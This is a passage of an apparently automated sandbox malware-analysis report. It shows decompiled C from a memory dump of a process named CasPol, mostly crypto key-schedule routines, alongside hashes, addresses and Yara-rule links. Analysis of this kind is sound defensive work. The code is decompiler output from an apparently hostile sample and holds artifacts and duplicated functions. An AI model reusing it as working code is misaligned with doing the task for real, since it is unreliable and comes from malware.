                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 020783bb0c6e94a2f0c879c0faef6be5a4f7e7562fff37f8ea5d2a0a7134f71c
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EEC1A6329187A1CFDB16CF38D98AB413FB1F796324B88425ED0A1535E2DB792115CF89
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 00405623 Relevance: .2, Instructions: 165COMMONCrypto
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            C-Code - Quality: 67%
                                                                                                                                                                                                                                                                                                                            			E00405623(intOrPtr _a4, signed int* _a8, signed int* _a12, intOrPtr _a16) {
				signed int _t66;
				signed int* _t69;
				signed int* _t81;
				signed int _t94;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int* _t110;
				signed int _t127;
				signed int _t129;
				signed int _t133;
				signed int _t152;
				intOrPtr _t171;

				_t81 = _a12;
				_t110 = _a8;
				asm("ror esi, 0x8");
				asm("rol eax, 0x8");
				 *_t110 =  *_t81 & 0xff00ff00 |  *_t81 & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[1] = _t81[1] & 0xff00ff00 | _t81[1] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[2] = _t81[2] & 0xff00ff00 | _t81[2] & 0x00ff00ff;
				_t66 =  &(_t110[1]);
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[3] = _t81[3] & 0xff00ff00 | _t81[3] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[4] = _t81[4] & 0xff00ff00 | _t81[4] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[5] = _t81[5] & 0xff00ff00 | _t81[5] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[6] = _t81[6] & 0xff00ff00 | _t81[6] & 0x00ff00ff;
				asm("ror esi, 0x8");
				asm("rol ecx, 0x8");
				_t110[7] = _t81[7] & 0xff00ff00 | _t81[7] & 0x00ff00ff;
				if(_a16 != 0x100) {
					L4:
					return _t66 | 0xffffffff;
				} else {
					_t171 = _a4;
					_t69 = 0;
					_a12 = 0;
					while(1) {
						_t152 =  *(_t66 + 0x18);
						_t94 = ( *(_t171 + 4 + (_t152 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t171 +  &(_t69[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t171 + 4 + (_t152 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 5 + (_t152 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t171 + 4 + (_t152 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t66 - 4);
						_t127 =  *_t66 ^ _t94;
						 *(_t66 + 0x1c) = _t94;
						_t96 =  *(_t66 + 4) ^ _t127;
						 *(_t66 + 0x20) = _t127;
						_t129 =  *(_t66 + 8) ^ _t96;
						 *(_t66 + 0x24) = _t96;
						 *(_t66 + 0x28) = _t129;
						if(_t69 == 6) {
							break;
						}
						_t106 = ( *(_t171 + 4 + (_t129 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t171 + 4 + (_t129 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 4 + (_t129 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t171 + 5 + (_t129 & 0x000000ff) * 4) & 0x000000ff ^  *(_t66 + 0xc);
						_t133 =  *(_t66 + 0x10) ^ _t106;
						 *(_t66 + 0x2c) = _t106;
						_t108 =  *(_t66 + 0x14) ^ _t133;
						 *(_t66 + 0x34) = _t108;
						_t69 =  &(_a12[0]);
						 *(_t66 + 0x30) = _t133;
						 *(_t66 + 0x38) = _t108 ^ _t152;
						_t66 = _t66 + 0x20;
						_a12 = _t69;
						if(_t69 < 7) {
							continue;
						} else {
							goto L4;
						}
						goto L6;
					}
					return 0xe;
				}
				L6:
			}
















                                                                                                                                                                                                                                                                                                                            0x00405626
                                                                                                                                                                                                                                                                                                                            0x0040562b
                                                                                                                                                                                                                                                                                                                            0x00405633
                                                                                                                                                                                                                                                                                                                            0x0040563c
                                                                                                                                                                                                                                                                                                                            0x00405646
                                                                                                                                                                                                                                                                                                                            0x0040564d
                                                                                                                                                                                                                                                                                                                            0x00405656
                                                                                                                                                                                                                                                                                                                            0x00405661
                                                                                                                                                                                                                                                                                                                            0x00405669
                                                                                                                                                                                                                                                                                                                            0x00405672
                                                                                                                                                                                                                                                                                                                            0x0040567d
                                                                                                                                                                                                                                                                                                                            0x00405683
                                                                                                                                                                                                                                                                                                                            0x00405688
                                                                                                                                                                                                                                                                                                                            0x00405691
                                                                                                                                                                                                                                                                                                                            0x0040569c
                                                                                                                                                                                                                                                                                                                            0x004056a4
                                                                                                                                                                                                                                                                                                                            0x004056ad
                                                                                                                                                                                                                                                                                                                            0x004056b8
                                                                                                                                                                                                                                                                                                                            0x004056c0
                                                                                                                                                                                                                                                                                                                            0x004056c9
                                                                                                                                                                                                                                                                                                                            0x004056d4
                                                                                                                                                                                                                                                                                                                            0x004056dc
                                                                                                                                                                                                                                                                                                                            0x004056e5
                                                                                                                                                                                                                                                                                                                            0x004056f0
                                                                                                                                                                                                                                                                                                                            0x004056f8
                                                                                                                                                                                                                                                                                                                            0x00405701
                                                                                                                                                                                                                                                                                                                            0x00405713
                                                                                                                                                                                                                                                                                                                            0x00405716
                                                                                                                                                                                                                                                                                                                            0x00405832
                                                                                                                                                                                                                                                                                                                            0x00405837
                                                                                                                                                                                                                                                                                                                            0x0040571c
                                                                                                                                                                                                                                                                                                                            0x0040571c
                                                                                                                                                                                                                                                                                                                            0x0040571f
                                                                                                                                                                                                                                                                                                                            0x00405721
                                                                                                                                                                                                                                                                                                                            0x00405724
                                                                                                                                                                                                                                                                                                                            0x00405724
                                                                                                                                                                                                                                                                                                                            0x00405789
                                                                                                                                                                                                                                                                                                                            0x0040578e
                                                                                                                                                                                                                                                                                                                            0x00405790
                                                                                                                                                                                                                                                                                                                            0x00405796
                                                                                                                                                                                                                                                                                                                            0x00405798
                                                                                                                                                                                                                                                                                                                            0x0040579e
                                                                                                                                                                                                                                                                                                                            0x004057a0
                                                                                                                                                                                                                                                                                                                            0x004057a3
                                                                                                                                                                                                                                                                                                                            0x004057a9
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00405805
                                                                                                                                                                                                                                                                                                                            0x0040580b
                                                                                                                                                                                                                                                                                                                            0x0040580d
                                                                                                                                                                                                                                                                                                                            0x00405813
                                                                                                                                                                                                                                                                                                                            0x00405815
                                                                                                                                                                                                                                                                                                                            0x0040581a
                                                                                                                                                                                                                                                                                                                            0x0040581b
                                                                                                                                                                                                                                                                                                                            0x0040581e
                                                                                                                                                                                                                                                                                                                            0x00405821
                                                                                                                                                                                                                                                                                                                            0x00405824
                                                                                                                                                                                                                                                                                                                            0x0040582a
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x0040582a
                                                                                                                                                                                                                                                                                                                            0x00405841
                                                                                                                                                                                                                                                                                                                            0x00405841
                                                                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                                            • Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                                                                                                                                                                                                                                                                                            • Instruction ID: c92e21bcf2a8b426bbd036bc601a8418409ab627789888f1acc8345be8f7aa48
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 405174B3E14A214BD3188E09CC40632B792FFD8312B5F81BEDD199B357CA74E9529A90
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 0040561A Relevance: .2, Instructions: 159COMMONCrypto
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            C-Code - Quality: 66%
                                                                                                                                                                                                                                                                                                                            			E0040561A(void* __eax, intOrPtr* __edx, intOrPtr _a4, signed int* _a8, signed int* _a12, intOrPtr _a16, char _a1412832062) {
				signed int _t68;
				signed int* _t73;
				signed int* _t86;
				signed int _t99;
				signed int _t101;
				signed int _t111;
				signed int _t113;
				signed int* _t116;
				signed int _t133;
				signed int _t135;
				signed int _t139;
				signed int _t160;
				intOrPtr _t182;

				 *__edx =  *__edx - 1;
				_push( &_a1412832062);
				_t86 = _a12;
				_t116 = _a8;
				asm("ror esi, 0x8");
				asm("rol eax, 0x8");
				 *_t116 =  *_t86 & 0xff00ff00 |  *_t86 & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t116[1] = _t86[1] & 0xff00ff00 | _t86[1] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t116[2] = _t86[2] & 0xff00ff00 | _t86[2] & 0x00ff00ff;
				_t68 =  &(_t116[1]);
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t116[3] = _t86[3] & 0xff00ff00 | _t86[3] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t116[4] = _t86[4] & 0xff00ff00 | _t86[4] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t116[5] = _t86[5] & 0xff00ff00 | _t86[5] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t116[6] = _t86[6] & 0xff00ff00 | _t86[6] & 0x00ff00ff;
				asm("ror esi, 0x8");
				asm("rol ecx, 0x8");
				_t116[7] = _t86[7] & 0xff00ff00 | _t86[7] & 0x00ff00ff;
				if(_a16 != 0x100) {
					L5:
					return _t68 | 0xffffffff;
				} else {
					_t182 = _a4;
					_t73 = 0;
					_a12 = 0;
					while(1) {
						_t160 =  *(_t68 + 0x18);
						_t99 = ( *(_t182 + 4 + (_t160 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t182 +  &(_t73[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t182 + 4 + (_t160 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t182 + 5 + (_t160 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t182 + 4 + (_t160 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t68 - 4);
						_t133 =  *_t68 ^ _t99;
						 *(_t68 + 0x1c) = _t99;
						_t101 =  *(_t68 + 4) ^ _t133;
						 *(_t68 + 0x20) = _t133;
						_t135 =  *(_t68 + 8) ^ _t101;
						 *(_t68 + 0x24) = _t101;
						 *(_t68 + 0x28) = _t135;
						if(_t73 == 6) {
							break;
						}
						_t111 = ( *(_t182 + 4 + (_t135 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t182 + 4 + (_t135 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t182 + 4 + (_t135 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t182 + 5 + (_t135 & 0x000000ff) * 4) & 0x000000ff ^  *(_t68 + 0xc);
						_t139 =  *(_t68 + 0x10) ^ _t111;
						 *(_t68 + 0x2c) = _t111;
						_t113 =  *(_t68 + 0x14) ^ _t139;
						 *(_t68 + 0x34) = _t113;
						_t73 =  &(_a12[0]);
						 *(_t68 + 0x30) = _t139;
						 *(_t68 + 0x38) = _t113 ^ _t160;
						_t68 = _t68 + 0x20;
						_a12 = _t73;
						if(_t73 < 7) {
							continue;
						} else {
							goto L5;
						}
						goto L7;
					}
					return 0xe;
				}
				L7:
			}
















                                                                                                                                                                                                                                                                                                                            0x00405620
                                                                                                                                                                                                                                                                                                                            0x00405623
                                                                                                                                                                                                                                                                                                                            0x00405626
                                                                                                                                                                                                                                                                                                                            0x0040562b
                                                                                                                                                                                                                                                                                                                            0x00405633
                                                                                                                                                                                                                                                                                                                            0x0040563c
                                                                                                                                                                                                                                                                                                                            0x00405646
                                                                                                                                                                                                                                                                                                                            0x0040564d
                                                                                                                                                                                                                                                                                                                            0x00405656
                                                                                                                                                                                                                                                                                                                            0x00405661
                                                                                                                                                                                                                                                                                                                            0x00405669
                                                                                                                                                                                                                                                                                                                            0x00405672
                                                                                                                                                                                                                                                                                                                            0x0040567d
                                                                                                                                                                                                                                                                                                                            0x00405683
                                                                                                                                                                                                                                                                                                                            0x00405688
                                                                                                                                                                                                                                                                                                                            0x00405691
                                                                                                                                                                                                                                                                                                                            0x0040569c
                                                                                                                                                                                                                                                                                                                            0x004056a4
                                                                                                                                                                                                                                                                                                                            0x004056ad
                                                                                                                                                                                                                                                                                                                            0x004056b8
                                                                                                                                                                                                                                                                                                                            0x004056c0
                                                                                                                                                                                                                                                                                                                            0x004056c9
                                                                                                                                                                                                                                                                                                                            0x004056d4
                                                                                                                                                                                                                                                                                                                            0x004056dc
                                                                                                                                                                                                                                                                                                                            0x004056e5
                                                                                                                                                                                                                                                                                                                            0x004056f0
                                                                                                                                                                                                                                                                                                                            0x004056f8
                                                                                                                                                                                                                                                                                                                            0x00405701
                                                                                                                                                                                                                                                                                                                            0x00405713
                                                                                                                                                                                                                                                                                                                            0x00405716
                                                                                                                                                                                                                                                                                                                            0x00405830
                                                                                                                                                                                                                                                                                                                            0x00405837
                                                                                                                                                                                                                                                                                                                            0x0040571c
                                                                                                                                                                                                                                                                                                                            0x0040571c
                                                                                                                                                                                                                                                                                                                            0x0040571f
                                                                                                                                                                                                                                                                                                                            0x00405721
                                                                                                                                                                                                                                                                                                                            0x00405724
                                                                                                                                                                                                                                                                                                                            0x00405724
                                                                                                                                                                                                                                                                                                                            0x00405789
                                                                                                                                                                                                                                                                                                                            0x0040578e
                                                                                                                                                                                                                                                                                                                            0x00405790
                                                                                                                                                                                                                                                                                                                            0x00405796
                                                                                                                                                                                                                                                                                                                            0x00405798
                                                                                                                                                                                                                                                                                                                            0x0040579e
                                                                                                                                                                                                                                                                                                                            0x004057a0
                                                                                                                                                                                                                                                                                                                            0x004057a3
                                                                                                                                                                                                                                                                                                                            0x004057a9
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00405805
                                                                                                                                                                                                                                                                                                                            0x0040580b
                                                                                                                                                                                                                                                                                                                            0x0040580d
                                                                                                                                                                                                                                                                                                                            0x00405813
                                                                                                                                                                                                                                                                                                                            0x00405815
                                                                                                                                                                                                                                                                                                                            0x0040581a
                                                                                                                                                                                                                                                                                                                            0x0040581b
                                                                                                                                                                                                                                                                                                                            0x0040581e
                                                                                                                                                                                                                                                                                                                            0x00405821
                                                                                                                                                                                                                                                                                                                            0x00405824
                                                                                                                                                                                                                                                                                                                            0x0040582a
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x0040582a
                                                                                                                                                                                                                                                                                                                            0x00405841
                                                                                                                                                                                                                                                                                                                            0x00405841
                                                                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 2ce704aa24f96a960dd36de3184e2fe5393f6b25cf4a27a029cfee13f74fcba8
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 7a5e131291d5020cb5b90ce682f62ef5b0e82d6bf1bae1d424c5499887998d5c
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2ce704aa24f96a960dd36de3184e2fe5393f6b25cf4a27a029cfee13f74fcba8
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EE51A5B3E14A214BD3188F09CD40632B692FFD8312B5FC1BECD199B357CE74A9529A90
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 004038BC Relevance: .1, Instructions: 114COMMONCrypto
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                                                                                                            			E004038BC(signed char* __eax, void* __eflags) {
				signed char* _t39;
				unsigned int _t58;
				signed int _t60;
				unsigned int _t64;
				unsigned int _t72;
				unsigned int _t80;
				unsigned int _t87;
				signed int _t91;
				signed char _t94;
				signed char _t97;
				signed char _t100;
				unsigned int _t108;

				_t39 = __eax;
				asm("sbb eax, 0x577c1a12");
				if(__eflags >= 0) {
					_t91 = __eax[0xe] & 0x000000ff;
					_t60 = ((__eax[0xc] & 0x000000ff) << 0x00000008 | __eax[0xd] & 0x000000ff) & 0x0000ffff;
				}
				 *_t39 =  *_t39 + 1;
				 *((intOrPtr*)(_t60 - 0x1e)) =  *((intOrPtr*)(_t60 - 0x1e)) + _t39;
				asm("loope 0xa");
				_t64 = ( &(_t39[_t60]) | _t91) << 0x00000007 | (_t39[0xf] & 0x000000ff) >> 0x00000001;
				_t94 = _t39[0xb];
				if((_t94 & 0x00000001) != 0) {
					_t64 = _t64 | 0x80000000;
				}
				_t39[0xc] = _t64 >> 0x18;
				_t39[0xf] = _t64;
				_t39[0xd] = _t64 >> 0x10;
				_t72 = ((((_t39[8] & 0x000000ff) << 0x00000008 | _t39[9] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t39[0xa] & 0xff) << 0x00000007 | (_t94 & 0x000000ff) >> 0x00000001;
				_t97 = _t39[7];
				_t39[0xe] = _t64 >> 8;
				if((_t97 & 0x00000001) != 0) {
					_t72 = _t72 | 0x80000000;
				}
				_t39[8] = _t72 >> 0x18;
				_t39[0xb] = _t72;
				_t39[9] = _t72 >> 0x10;
				_t80 = ((((_t39[4] & 0x000000ff) << 0x00000008 | _t39[5] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t39[6] & 0xff) << 0x00000007 | (_t97 & 0x000000ff) >> 0x00000001;
				_t100 = _t39[3];
				_t39[0xa] = _t72 >> 8;
				if((_t100 & 0x00000001) != 0) {
					_t80 = _t80 | 0x80000000;
				}
				_t39[4] = _t80 >> 0x18;
				_t39[7] = _t80;
				_t39[5] = _t80 >> 0x10;
				_t87 = (((_t39[1] & 0x000000ff) << 0x00000008 | _t39[2] & 0x000000ff) & 0x00ffffff | ( *_t39 & 0x000000ff) << 0x00000010) << 0x00000007 | (_t100 & 0x000000ff) >> 0x00000001;
				 *_t39 = _t87 >> 0x18;
				_t39[1] = _t87 >> 0x10;
				_t58 = _t80 >> 8;
				_t108 = _t87 >> 8;
				_t39[6] = _t58;
				_t39[2] = _t108;
				_t39[3] = _t87;
				return _t39;
			}















                                                                                                                                                                                                                                                                                                                            0x004038bc
                                                                                                                                                                                                                                                                                                                            0x004038bc
                                                                                                                                                                                                                                                                                                                            0x004038c1
                                                                                                                                                                                                                                                                                                                            0x004038d0
                                                                                                                                                                                                                                                                                                                            0x004038d4
                                                                                                                                                                                                                                                                                                                            0x004038d4
                                                                                                                                                                                                                                                                                                                            0x004038d7
                                                                                                                                                                                                                                                                                                                            0x004038d9
                                                                                                                                                                                                                                                                                                                            0x004038e1
                                                                                                                                                                                                                                                                                                                            0x004038ee
                                                                                                                                                                                                                                                                                                                            0x004038f0
                                                                                                                                                                                                                                                                                                                            0x004038f6
                                                                                                                                                                                                                                                                                                                            0x004038f8
                                                                                                                                                                                                                                                                                                                            0x004038f8
                                                                                                                                                                                                                                                                                                                            0x00403904
                                                                                                                                                                                                                                                                                                                            0x00403909
                                                                                                                                                                                                                                                                                                                            0x0040390f
                                                                                                                                                                                                                                                                                                                            0x0040393f
                                                                                                                                                                                                                                                                                                                            0x00403941
                                                                                                                                                                                                                                                                                                                            0x00403947
                                                                                                                                                                                                                                                                                                                            0x0040394d
                                                                                                                                                                                                                                                                                                                            0x0040394f
                                                                                                                                                                                                                                                                                                                            0x0040394f
                                                                                                                                                                                                                                                                                                                            0x0040395e
                                                                                                                                                                                                                                                                                                                            0x00403963
                                                                                                                                                                                                                                                                                                                            0x00403969
                                                                                                                                                                                                                                                                                                                            0x00403994
                                                                                                                                                                                                                                                                                                                            0x00403996
                                                                                                                                                                                                                                                                                                                            0x0040399c
                                                                                                                                                                                                                                                                                                                            0x004039a2
                                                                                                                                                                                                                                                                                                                            0x004039a4
                                                                                                                                                                                                                                                                                                                            0x004039a4
                                                                                                                                                                                                                                                                                                                            0x004039b3
                                                                                                                                                                                                                                                                                                                            0x004039bb
                                                                                                                                                                                                                                                                                                                            0x004039be
                                                                                                                                                                                                                                                                                                                            0x004039e2
                                                                                                                                                                                                                                                                                                                            0x004039e9
                                                                                                                                                                                                                                                                                                                            0x004039f0
                                                                                                                                                                                                                                                                                                                            0x004039f3
                                                                                                                                                                                                                                                                                                                            0x004039f8
                                                                                                                                                                                                                                                                                                                            0x004039fc
                                                                                                                                                                                                                                                                                                                            0x004039ff
                                                                                                                                                                                                                                                                                                                            0x00403a02
                                                                                                                                                                                                                                                                                                                            0x00403a06

                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                                            • Opcode ID: defec63538b86a58b481b414b20826ef7e397a4e7b8e4f3801a8f2a95dbf5652
                                                                                                                                                                                                                                                                                                                            • Instruction ID: e6f425d5863dca231ab35ba66d242bcfbf69a6ad0e8344f3b95d00dd7e46202d
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: defec63538b86a58b481b414b20826ef7e397a4e7b8e4f3801a8f2a95dbf5652
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 354182516586F14ED31E436D08B9675AFD18E9720274EC2FEDADA6F2F3C0988408D3A5
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 004038C3 Relevance: .1, Instructions: 108COMMONCrypto
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                                                                                                                                                                                            			E004038C3(signed char* __eax) {
				signed char* _t39;
				unsigned int _t58;
				signed int _t63;
				unsigned int _t67;
				unsigned int _t75;
				unsigned int _t83;
				unsigned int _t90;
				signed int _t92;
				signed char _t95;
				signed char _t98;
				signed char _t101;
				unsigned int _t109;

				_t39 = __eax;
				_t92 = __eax[0xe] & 0x000000ff;
				_t63 = ((__eax[0xc] & 0x000000ff) << 0x00000008 | __eax[0xd] & 0x000000ff) & 0x0000ffff;
				 *__eax =  *__eax + 1;
				 *((intOrPtr*)(_t63 - 0x1e)) =  *((intOrPtr*)(_t63 - 0x1e)) + __eax;
				asm("loope 0xa");
				_t67 = ( &(__eax[_t63]) | _t92) << 0x00000007 | (__eax[0xf] & 0x000000ff) >> 0x00000001;
				_t95 = __eax[0xb];
				if((_t95 & 0x00000001) != 0) {
					_t67 = _t67 | 0x80000000;
				}
				_t39[0xc] = _t67 >> 0x18;
				_t39[0xf] = _t67;
				_t39[0xd] = _t67 >> 0x10;
				_t75 = ((((_t39[8] & 0x000000ff) << 0x00000008 | _t39[9] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t39[0xa] & 0xff) << 0x00000007 | (_t95 & 0x000000ff) >> 0x00000001;
				_t98 = _t39[7];
				_t39[0xe] = _t67 >> 8;
				if((_t98 & 0x00000001) != 0) {
					_t75 = _t75 | 0x80000000;
				}
				_t39[8] = _t75 >> 0x18;
				_t39[0xb] = _t75;
				_t39[9] = _t75 >> 0x10;
				_t83 = ((((_t39[4] & 0x000000ff) << 0x00000008 | _t39[5] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t39[6] & 0xff) << 0x00000007 | (_t98 & 0x000000ff) >> 0x00000001;
				_t101 = _t39[3];
				_t39[0xa] = _t75 >> 8;
				if((_t101 & 0x00000001) != 0) {
					_t83 = _t83 | 0x80000000;
				}
				_t39[4] = _t83 >> 0x18;
				_t39[7] = _t83;
				_t39[5] = _t83 >> 0x10;
				_t90 = (((_t39[1] & 0x000000ff) << 0x00000008 | _t39[2] & 0x000000ff) & 0x00ffffff | ( *_t39 & 0x000000ff) << 0x00000010) << 0x00000007 | (_t101 & 0x000000ff) >> 0x00000001;
				 *_t39 = _t90 >> 0x18;
				_t39[1] = _t90 >> 0x10;
				_t58 = _t83 >> 8;
				_t109 = _t90 >> 8;
				_t39[6] = _t58;
				_t39[2] = _t109;
				_t39[3] = _t90;
				return _t39;
			}















                                                                                                                                                                                                                                                                                                                            0x004038c3
                                                                                                                                                                                                                                                                                                                            0x004038d0
                                                                                                                                                                                                                                                                                                                            0x004038d4
                                                                                                                                                                                                                                                                                                                            0x004038d7
                                                                                                                                                                                                                                                                                                                            0x004038d9
                                                                                                                                                                                                                                                                                                                            0x004038e1
                                                                                                                                                                                                                                                                                                                            0x004038ee
                                                                                                                                                                                                                                                                                                                            0x004038f0
                                                                                                                                                                                                                                                                                                                            0x004038f6
                                                                                                                                                                                                                                                                                                                            0x004038f8
                                                                                                                                                                                                                                                                                                                            0x004038f8
                                                                                                                                                                                                                                                                                                                            0x00403904
                                                                                                                                                                                                                                                                                                                            0x00403909
                                                                                                                                                                                                                                                                                                                            0x0040390f
                                                                                                                                                                                                                                                                                                                            0x0040393f
                                                                                                                                                                                                                                                                                                                            0x00403941
                                                                                                                                                                                                                                                                                                                            0x00403947
                                                                                                                                                                                                                                                                                                                            0x0040394d
                                                                                                                                                                                                                                                                                                                            0x0040394f
                                                                                                                                                                                                                                                                                                                            0x0040394f
                                                                                                                                                                                                                                                                                                                            0x0040395e
                                                                                                                                                                                                                                                                                                                            0x00403963
                                                                                                                                                                                                                                                                                                                            0x00403969
                                                                                                                                                                                                                                                                                                                            0x00403994
                                                                                                                                                                                                                                                                                                                            0x00403996
                                                                                                                                                                                                                                                                                                                            0x0040399c
                                                                                                                                                                                                                                                                                                                            0x004039a2
                                                                                                                                                                                                                                                                                                                            0x004039a4
                                                                                                                                                                                                                                                                                                                            0x004039a4
                                                                                                                                                                                                                                                                                                                            0x004039b3
                                                                                                                                                                                                                                                                                                                            0x004039bb
                                                                                                                                                                                                                                                                                                                            0x004039be
                                                                                                                                                                                                                                                                                                                            0x004039e2
                                                                                                                                                                                                                                                                                                                            0x004039e9
                                                                                                                                                                                                                                                                                                                            0x004039f0
                                                                                                                                                                                                                                                                                                                            0x004039f3
                                                                                                                                                                                                                                                                                                                            0x004039f8
                                                                                                                                                                                                                                                                                                                            0x004039fc
                                                                                                                                                                                                                                                                                                                            0x004039ff
                                                                                                                                                                                                                                                                                                                            0x00403a02
                                                                                                                                                                                                                                                                                                                            0x00403a06

                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
